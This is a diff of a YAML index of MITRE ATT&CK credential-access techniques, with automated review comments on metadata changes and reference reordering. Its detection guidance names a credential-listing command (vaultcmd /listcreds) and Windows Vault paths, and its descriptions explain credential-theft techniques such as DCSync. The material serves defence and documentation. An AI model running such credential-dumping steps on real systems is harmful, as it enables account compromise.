atomic_tests: []
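Review bot: T1558.002 loses both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` with no replacement visible, whereas every other object in this patch keeps or re-adds `x_mitre_attack_spec_version`. Combined with its `modified` date moving backwards to `2020-03-25T21:46:46.831Z` in the previous hunk, this object looks like it was regenerated from a different or older source than its neighbours. Confirm the field is still present elsewhere in the object before merging.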
T1555.004:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-15T16:44:35.906Z'
name: 'Credentials from Password Stores: Windows Credential Manager'
description: |-
Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker)
@@ -47763,24 +48493,24 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - Bernaldo Penas Antelo
+ - Mugdha Peter Bansode
+ - Uriel Kosayev
+ - Vadim Khrykov
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor process and command-line parameters of vaultcmd.exe
for suspicious activity, such as listing credentials from the Windows Credentials locker (i.e., vaultcmd /listcreds:“Windows Credentials”
).(Citation: Malwarebytes The Windows Vault)
Consider monitoring API calls such as CredEnumerateA
that may list credentials from the Windows Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)
Consider monitoring file reads to Vault locations, %Systemdrive%\Users\\[Username]\AppData\Local\Microsoft\\[Vault/Credentials]\
, for suspicious activity.(Citation: Malwarebytes The Windows Vault)
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
x_mitre_version: '1.1'
- x_mitre_contributors:
- - Bernaldo Penas Antelo
- - Mugdha Peter Bansode
- - Uriel Kosayev
- - Vadim Khrykov
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
@@ -47821,36 +48551,13 @@ credential-access:
url: https://www.passcape.com/windows_password_recovery_vault_explorer
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1555.004
atomic_tests: []
T1556.001:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
- type: attack-pattern
- created: '2020-02-11T19:05:02.399Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.001
- url: https://attack.mitre.org/techniques/T1556/001
- - source_name: Dell Skeleton
- description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
- Retrieved April 8, 2019.
- url: https://www.secureworks.com/research/skeleton-key-malware-analysis
- - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
- description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
- June 3, 2016.
- source_name: TechNet Audit Policy
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T15:26:54.386Z'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
@@ -47871,6 +48578,7 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor for calls to OpenProcess
that can be
used to manipulate lsass.exe running on a domain controller as well as for
malicious modifications to functions exported from authentication-related
@@ -47885,52 +48593,42 @@ credential-access:
used to execute binaries on a remote system as a particular account. Correlate
other security systems with login information (e.g. a user has an active login
session but has not entered the building or does not have VPN access). "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Process: Process Access'
- 'File: File Modification'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
- atomic_tests: []
- T1556.005:
- technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
type: attack-pattern
- created: '2022-01-13T20:02:28.349Z'
+ id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+ created: '2020-02-11T19:05:02.399Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1556.005
- url: https://attack.mitre.org/techniques/T1556/005
- - source_name: store_pwd_rev_enc
- url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
- description: Microsoft. (2021, October 28). Store passwords using reversible
- encryption. Retrieved January 3, 2022.
- - source_name: how_pwd_rev_enc_1
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
- description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
- encryption: how it works (part 1). Retrieved November 17, 2021.'
- - source_name: how_pwd_rev_enc_2
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
- description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
- encryption: how it works (part 2). Retrieved November 17, 2021.'
- - source_name: dump_pwd_dcsync
- url: https://adsecurity.org/?p=2053
- description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
- All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1556/001
+ external_id: T1556.001
+ - source_name: Dell Skeleton
+ description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+ Retrieved April 8, 2019.
+ url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+ - source_name: TechNet Audit Policy
+ description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+ June 3, 2016.
+ url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1556.005:
+ technique:
+ modified: '2024-08-26T15:40:31.871Z'
name: Reversible Encryption
description: |-
An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The AllowReversiblePasswordEncryption
property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
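Review bot: this hunk interleaves the tail of T1556.001 with the head of T1556.005 because both objects were reordered at once, so the removed T1556.005 reference entries (`store_pwd_rev_enc`, `how_pwd_rev_enc_1`, `how_pwd_rev_enc_2`, `dump_pwd_dcsync`) are only matched by additions in the following hunk, and a reviewer has to hold two objects in mind to verify nothing was lost. Splitting the key-order normalisation from the content sync would avoid that. Substantively, T1556.001 drops `x_mitre_permissions_required: Administrator`, gains `revoked: false`, and re-states `x_mitre_platforms: Windows` at a new position; its references are unchanged.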
@@ -47952,6 +48650,7 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor property changes in Group Policy: Computer
Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
Policy\\Store passwords using reversible encryption
. By default, the
@@ -47962,23 +48661,50 @@ credential-access:
Directory PowerShell modules, such as Set-ADUser
and Set-ADAccountControl
,
that change account configurations. \n\nMonitor Fine-Grained Password Policies
and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Command: Command Execution'
- 'User Account: User Account Metadata'
- 'Script: Script Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+ created: '2022-01-13T20:02:28.349Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/005
+ external_id: T1556.005
+ - source_name: dump_pwd_dcsync
+ description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+ All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+ url: https://adsecurity.org/?p=2053
+ - source_name: store_pwd_rev_enc
+ description: Microsoft. (2021, October 28). Store passwords using reversible
+ encryption. Retrieved January 3, 2022.
+ url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+ - source_name: how_pwd_rev_enc_1
+ description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+ encryption: how it works (part 1). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+ - source_name: how_pwd_rev_enc_2
+ description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+ encryption: how it works (part 2). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1111:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:37:20.612Z'
name: Multi-Factor Authentication Interception
description: "Adversaries may target multi-factor authentication (MFA) mechanisms,
(i.e., smart cards, token generators, etc.) to gain access to credentials
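Review bot: T1556.005's references are re-sorted so that `dump_pwd_dcsync` now precedes `store_pwd_rev_enc`; the entries themselves are identical to the ones removed in the previous hunk, so that is fine. The `x_mitre_permissions_required` list (`User`, `Administrator`) is dropped without replacement, same caveat as for T1556.001. The `modified` bump for T1111 at the end of the hunk is unrelated to the T1556.005 changes above it.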
@@ -48049,9 +48775,8 @@ credential-access:
url: https://sec.okta.com/scatterswine
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1003.003:
technique:
@@ -48110,12 +48835,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.003
atomic_tests: []
T1558.003:
technique:
- modified: '2023-03-30T21:01:46.538Z'
+ modified: '2024-09-23T22:20:10.994Z'
name: 'Steal or Forge Kerberos Tickets: Kerberoasting'
description: "Adversaries may abuse a valid Kerberos ticket-granting ticket
(TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket
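Review bot: T1003.003 loses `spec_version` but keeps `x_mitre_attack_spec_version: 3.1.0` and its `modified` is not touched, while neighbouring objects move to 3.2.0 with new timestamps. That is what an object that has not been updated upstream should look like, so no action is needed; it is a useful sanity check that the generator is not blindly rewriting spec versions across the board.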
@@ -48147,6 +48871,7 @@ credential-access:
phase_name: credential-access
x_mitre_contributors:
- Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: 'Enable Audit Kerberos Service Ticket Operations to log Kerberos
TGS service ticket requests. Particularly investigate irregular patterns of
activity (ex: accounts making numerous requests, Event ID 4769, within a small
@@ -48156,7 +48881,6 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.2'
@@ -48168,111 +48892,49 @@ credential-access:
id: attack-pattern--f2877f7f-9a4c-4251-879f-1224e3006bee
created: '2020-02-11T18:43:38.588Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1558/003
external_id: T1558.003
+ - source_name: Microsoft Detecting Kerberoasting Feb 2018
+ description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
+ using Azure Security Center. Retrieved March 23, 2018.
+ url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
- source_name: Empire InvokeKerberoast Oct 2016
description: EmpireProject. (2016, October 31). Invoke-Kerberoast.ps1. Retrieved
March 22, 2018.
url: https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1
+ - source_name: SANS Attacking Kerberos Nov 2014
+ description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
+ Guard Dog of Hades. Retrieved March 22, 2018.
+ url: https://redsiege.com/kerberoast-slides
- source_name: AdSecurity Cracking Kerberos Dec 2015
description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
Domain. Retrieved March 22, 2018.
url: https://adsecurity.org/?p=2293
- - source_name: Microsoft Detecting Kerberoasting Feb 2018
- description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
- using Azure Security Center. Retrieved March 23, 2018.
- url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
- - source_name: Microsoft SPN
- description: Microsoft. (n.d.). Service Principal Names. Retrieved March 22,
- 2018.
- url: https://msdn.microsoft.com/library/ms677949.aspx
- source_name: Microsoft SetSPN
description: Microsoft. (2010, April 13). Service Principal Names (SPNs) SetSPN
Syntax (Setspn.exe). Retrieved March 22, 2018.
url: https://social.technet.microsoft.com/wiki/contents/articles/717.service-principal-names-spns-setspn-syntax-setspn-exe.aspx
- - source_name: SANS Attacking Kerberos Nov 2014
- description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
- Guard Dog of Hades. Retrieved March 22, 2018.
- url: https://redsiege.com/kerberoast-slides
+ - source_name: Microsoft SPN
+ description: Microsoft. (n.d.). Service Principal Names. Retrieved March 22,
+ 2018.
+ url: https://msdn.microsoft.com/library/ms677949.aspx
- source_name: Harmj0y Kerberoast Nov 2016
description: Schroeder, W. (2016, November 1). Kerberoasting Without Mimikatz.
- Retrieved March 23, 2018.
- url: https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/
+ Retrieved September 23, 2024.
+ url: https://blog.harmj0y.net/powershell/kerberoasting-without-mimikatz/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1558.003
atomic_tests: []
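Review bot: the only content change in T1558.003's references is the harmj0y entry, whose URL moves from `www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/` to `blog.harmj0y.net/powershell/kerberoasting-without-mimikatz/` with a retrieval date of September 23, 2024 that matches the object's new `modified` timestamp; that is a genuine upstream link fix. The remaining entries (Bani, EmpireProject, Medin, Metcalf, Microsoft SetSPN, Microsoft SPN, Schroeder) are re-sorted with identical text, and re-adding `x_mitre_modified_by_ref` here balances its removal earlier in the object.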
T1003.006:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - ExtraHop
- - Vincent Le Toux
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163
- type: attack-pattern
- created: '2020-02-11T18:45:34.293Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1003.006
- url: https://attack.mitre.org/techniques/T1003/006
- - url: https://msdn.microsoft.com/library/cc228086.aspx
- description: Microsoft. (2017, December 1). MS-DRSR Directory Replication
- Service (DRS) Remote Protocol. Retrieved December 4, 2017.
- source_name: Microsoft DRSR Dec 2017
- - url: https://msdn.microsoft.com/library/dd207691.aspx
- description: Microsoft. (n.d.). IDL_DRSGetNCChanges (Opnum 3). Retrieved December
- 4, 2017.
- source_name: Microsoft GetNCCChanges
- - url: https://wiki.samba.org/index.php/DRSUAPI
- description: SambaWiki. (n.d.). DRSUAPI. Retrieved December 4, 2017.
- source_name: Samba DRSUAPI
- - url: https://source.winehq.org/WineAPI/samlib.html
- description: Wine API. (n.d.). samlib.dll. Retrieved December 4, 2017.
- source_name: Wine API samlib.dll
- - url: https://adsecurity.org/?p=1729
- description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
- and Detection. Retrieved August 7, 2017.
- source_name: ADSecurity Mimikatz DCSync
- - url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
- description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
- Oh My. Retrieved August 7, 2017.
- source_name: Harmj0y Mimikatz and DCSync
- - url: https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM
- description: Warren, J. (2017, July 11). Manipulating User Passwords with
- Mimikatz. Retrieved December 4, 2017.
- source_name: InsiderThreat ChangeNTLM July 2017
- - url: https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump
- description: Deply, B., Le Toux, V. (2016, June 5). module ~ lsadump. Retrieved
- August 7, 2017.
- source_name: GitHub Mimikatz lsadump Module
- - url: https://msdn.microsoft.com/library/cc237008.aspx
- description: Microsoft. (2017, December 1). MS-NRPC - Netlogon Remote Protocol.
- Retrieved December 6, 2017.
- source_name: Microsoft NRPC Dec 2017
- - url: https://msdn.microsoft.com/library/cc245496.aspx
- description: Microsoft. (n.d.). MS-SAMR Security Account Manager (SAM) Remote
- Protocol (Client-to-Server) - Transport. Retrieved December 4, 2017.
- source_name: Microsoft SAMR
- - url: https://adsecurity.org/?p=1729
- description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
- and Detection. Retrieved December 4, 2017.
- source_name: AdSecurity DCSync Sept 2015
- - url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
- description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
- Oh My. Retrieved December 4, 2017.
- source_name: Harmj0y DCSync Sept 2015
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T15:54:08.312Z'
name: 'OS Credential Dumping: DCSync'
description: |-
Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.
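Review bot: the T1003.006 object is deleted in full here (from `- x_mitre_platforms:` down to `- modified: '2022-04-25T14:00:00.188Z'`) only to be re-added below with its keys in a different order, so the substantive changes (`x_mitre_version: '1.0'` to `'1.1'`, `x_mitre_permissions_required` dropped, `revoked`/`x_mitre_deprecated` flags added, one harmj0y reference URL changed) are buried in a hunk pair of well over a hundred lines. Have the generator emit keys in a stable order (or sort them) so future upstream refreshes produce reviewable diffs, and list the field-level changes in the commit message. The T1558.003 tail in this same region drops `spec_version: '2.1'`, which STIX 2.1 requires on every SDO; if nothing downstream validates these blocks as STIX objects that is harmless, but say so.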
@@ -48283,26 +48945,88 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - ExtraHop
+ - Vincent Le Toux
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync.(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Also monitor for network protocols(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests(Citation: Microsoft SAMR) from IPs not associated with known domain controllers.(Citation: AdSecurity DCSync Sept 2015)
Note: Domain controllers may not log replication requests originating from the default domain controller account.(Citation: Harmj0y DCSync Sept 2015)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Access'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
- x_mitre_permissions_required:
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163
+ created: '2020-02-11T18:45:34.293Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1003/006
+ external_id: T1003.006
+ - source_name: GitHub Mimikatz lsadump Module
+ description: Deply, B., Le Toux, V. (2016, June 5). module ~ lsadump. Retrieved
+ August 7, 2017.
+ url: https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump
+ - source_name: ADSecurity Mimikatz DCSync
+ description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
+ and Detection. Retrieved August 7, 2017.
+ url: https://adsecurity.org/?p=1729
+ - source_name: AdSecurity DCSync Sept 2015
+ description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
+ and Detection. Retrieved December 4, 2017.
+ url: https://adsecurity.org/?p=1729
+ - source_name: Microsoft DRSR Dec 2017
+ description: Microsoft. (2017, December 1). MS-DRSR Directory Replication
+ Service (DRS) Remote Protocol. Retrieved December 4, 2017.
+ url: https://msdn.microsoft.com/library/cc228086.aspx
+ - source_name: Microsoft NRPC Dec 2017
+ description: Microsoft. (2017, December 1). MS-NRPC - Netlogon Remote Protocol.
+ Retrieved December 6, 2017.
+ url: https://msdn.microsoft.com/library/cc237008.aspx
+ - source_name: Microsoft GetNCCChanges
+ description: Microsoft. (n.d.). IDL_DRSGetNCChanges (Opnum 3). Retrieved December
+ 4, 2017.
+ url: https://msdn.microsoft.com/library/dd207691.aspx
+ - source_name: Microsoft SAMR
+ description: Microsoft. (n.d.). MS-SAMR Security Account Manager (SAM) Remote
+ Protocol (Client-to-Server) - Transport. Retrieved December 4, 2017.
+ url: https://msdn.microsoft.com/library/cc245496.aspx
+ - source_name: Samba DRSUAPI
+ description: SambaWiki. (n.d.). DRSUAPI. Retrieved December 4, 2017.
+ url: https://wiki.samba.org/index.php/DRSUAPI
+ - source_name: Harmj0y DCSync Sept 2015
+ description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
+ Oh My. Retrieved December 4, 2017.
+ url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
+ - source_name: Harmj0y Mimikatz and DCSync
+ description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
+ Oh My. Retrieved September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
+ - source_name: InsiderThreat ChangeNTLM July 2017
+ description: Warren, J. (2017, July 11). Manipulating User Passwords with
+ Mimikatz. Retrieved December 4, 2017.
+ url: https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM
+ - source_name: Wine API samlib.dll
+ description: Wine API. (n.d.). samlib.dll. Retrieved December 4, 2017.
+ url: https://source.winehq.org/WineAPI/samlib.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1003.006
atomic_tests: []
T1556:
technique:
- modified: '2024-04-11T21:51:44.851Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Modify Authentication Process
description: |-
Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
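Review bot: in the re-added T1003.006 `external_references` the same harmj0y article appears twice under different URLs: `url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/` under `Harmj0y DCSync Sept 2015` and `url: https://blog.harmj0y.net/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/` under `Harmj0y Mimikatz and DCSync`. Both source names are still cited (the detection text cites `Harmj0y DCSync Sept 2015`), so neither entry can be dropped, but the plain-http www.harmj0y.net link should be brought to the same https blog.harmj0y.net target that was just updated for its twin; `ADSecurity Mimikatz DCSync` and `AdSecurity DCSync Sept 2015` are likewise one URL under two names. If this index mirrors the upstream bundle verbatim, raise it upstream rather than hand-editing here. Separately, `x_mitre_permissions_required: - Administrator` is removed from this object while the same field is kept on T1556.004 and T1016.001 further down in this diff; confirm the removal is intended and that the index generator does not read that field anywhere.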
@@ -48315,6 +49039,7 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Chris Ross @xorrior
x_mitre_deprecated: false
@@ -48351,17 +49076,17 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Linux
- macOS
- Network
- - Azure AD
- - Google Workspace
- IaaS
- - Office 365
- SaaS
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Process: Process Access'
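Review bot: the platform list change in this hunk (`- Azure AD`, `- Google Workspace`, `- Office 365` removed; `+ - Office Suite`, `+ - Identity Provider` added, with `x_mitre_version` '2.4' to '2.5') renames platform strings that any per-platform index or matrix generation may key on; grep the generator and the Indexes directory for the old names before merging, since an index still keyed on "Azure AD" or "Google Workspace" will silently lose this technique. The same rename recurs below for T1069 and T1069.003. The `x_mitre_modified_by_ref` line added at the top of this hunk is the counterpart of the one removed at the object's tail, a pure move with no semantic change.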
@@ -48407,81 +49132,10 @@ credential-access:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1056.004:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
- type: attack-pattern
- created: '2020-02-11T19:01:15.930Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1056.004
- url: https://attack.mitre.org/techniques/T1056/004
- - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
- description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
- Retrieved December 18, 2017.
- url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
- - url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
- description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
- source_name: Microsoft Hook Overview
- - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
- A Technical Survey Of Common And Trending Process Injection Techniques.
- Retrieved December 7, 2017.'
- source_name: Elastic Process Injection July 2017
- - url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
- description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
- Retrieved December 12, 2017.'
